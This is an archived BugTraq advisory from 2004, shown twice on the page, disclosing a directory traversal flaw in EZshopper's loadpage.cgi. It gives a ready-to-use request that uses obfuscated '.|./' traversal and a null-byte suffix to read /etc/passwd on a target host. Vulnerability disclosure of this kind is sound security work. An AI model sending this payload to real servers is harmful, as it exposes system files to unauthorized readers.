BugTraq
Back to list
|
Post reply
EZshopper is still vulnerable against Directory Traversal.
Nov 25 2004 03:33PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)
Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X (at) excluded (dot) org [email concealed]>
loadpage.cgi of EZshopper allows Directory Traversal
Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.
|./etc/passwd%00.html
- Zero X
- http://www.excluded.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X (at) excluded (dot) org [email concealed]>
loadpage.cgi of EZshopper allows Directory Traversal
Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.
|./etc/passwd%00.html
- Zero X
- http://www.excluded.org
[ reply ]